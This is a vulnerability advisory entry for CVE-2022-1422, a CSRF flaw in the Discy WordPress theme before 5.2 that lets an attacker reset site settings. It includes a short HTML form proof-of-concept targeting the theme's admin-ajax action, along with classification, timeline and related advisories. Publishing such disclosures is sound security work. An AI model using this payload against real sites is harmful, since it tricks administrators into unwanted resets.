Discy < 5.2 – Restore Default Settings via CSRF | CVE 2022-1422 | Theme Vulnerabilities

Description

The theme does not check for CSRF tokens in the AJAX action discy_reset_options, allowing an attacker to trick an admin into resetting the site settings back to defaults.

Proof of Concept

<html>
  <body>
    <form action="http://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="discy_reset_options" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Themes

Fixed in 5.2

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

Bikram Kharal

Submitter

Bikram Kharal

Submitter twitter

Verified

Yes

WPVDB ID

29aff4bf-1691-4dc1-a670-1f2c9a765a3b

Timeline

Publicly Published

2022-05-16 (about 1 years ago)

Added

2022-05-16 (about 1 years ago)

Last Updated

2022-05-17 (about 1 years ago)

Other

Published

Title

Published

2015-05-26

Title

WP Fastest Cache < 0.8.3.5 - Multiple CSRF

Published

2023-09-25

Title

BEAR for WordPress < 1.1.4 - Arbitrary Settings Update via CSRF

Published

2024-04-22

Title

Seers | GDPR & CCPA Cookie Consent & Compliance < 8.1.1 - Cross-Site Request Forgery

Published

2024-01-03

Title

Custom User CSS <= 0.2 - Settings Update via CSRF

Published

2022-09-28

Title

Booking Ultra Pro < 1.1.7 - Stored Cross-Site Scripting via CSRF